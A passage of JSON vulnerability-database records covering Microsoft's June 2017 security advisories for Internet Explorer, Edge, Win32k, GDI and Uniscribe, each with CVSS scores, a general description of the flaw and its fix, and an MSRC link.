"edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Internet Explorer Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8547", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8547", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8547", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nAn authenticated attacker could exploit this vulnerability by running a specially crafted application.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8553", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8553", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8553", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8466", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8466", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8466", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "An elevation of privilege vulnerability exists when Windows Secure Kernel Mode fails to properly handle objects in memory.\n\nTo exploit the vulnerability, a locally-authenticated attacker could attempt to run a specially crafted application on a targeted system. An attacker who successfully exploited the vulnerability could violate virtual trust levels (VTL).\n\nThe security update addresses the vulnerability by correcting how Windows handles objects in memory to properly enforce VTLs.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8494", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8494", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8494", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege exists in Windows when a DCOM object in Helppane.exe, configured to run as the interactive user, fails to properly authenticate the client. An attacker who successfully exploited the vulnerability could run arbitrary code in another user's session.\n\nTo exploit the vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability after another user logged on to the same system via Terminal Services or Fast User Switching.\n\nThe update addresses the vulnerability by correcting how Helppane.exe authenticates the client.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows COM Session Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0298", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0298", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0298", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0287", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0287", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0287", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8499", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8499", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8499", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists in Microsoft Edge that allows JavaScript XML DOM objects to detect installed browser extensions.\n\nTo exploit the vulnerability, in a web-based attack scenario, an attacker could host a malicious website in an attempt to make a user visit it. However, an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action. For example, an attacker could trick a user into clicking a link that takes the user to the attacker's site.\n\nAn attacker who successfully exploited the vulnerability could potentially read data not intended to be disclosed. Note that the vulnerability would not allow an attacker to either execute code or elevate a user\u2019s rights directly, but the vulnerability could be used to obtain information in an attempt to further compromise the affected system.\n\nThe security update addresses the vulnerability by restricting what information is returned to Microsoft Edge by affected JavaScript object methods.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8498", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8498", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8498", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-0289"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0289", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0289", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8549", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8549", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8549", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit the vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by way of enticement in an email or Instant Messenger message, or by getting them to open an attachment sent through email.\n\nThe security update addresses the vulnerability by modifying how Microsoft Edge handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Edge Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8521", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8521", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8521", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-18T20:21:09", "description": "A Win32k information disclosure vulnerability exists when the Windows GDI component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0288", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-0288", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0288", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n\nThe update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Uniscribe Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8534"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8534", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8534", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThere are multiple ways an attacker could exploit this vulnerability:\n\n * In a web-based attack scenario, an attacker could host a specially crafted website designed to exploit this vulnerability and then convince a user to view the website. An attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an email or instant message that takes users to the attacker's website, or by opening an attachment sent through email.\n\n * In a file-sharing attack scenario, an attacker could provide a specially crafted document file designed to exploit this vulnerability and then convince a user to open the document file.\n\nThe security update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows Uniscribe Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8528", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8528", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8528", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:22", "description": "A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe security update addresses the vulnerability by modifying how Microsoft browser JavaScript scripting engines handle objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8524", "CVE-2017-8529"], "modified": "2017-06-27T07:00:00", "id": "MS:CVE-2017-8524", "href": 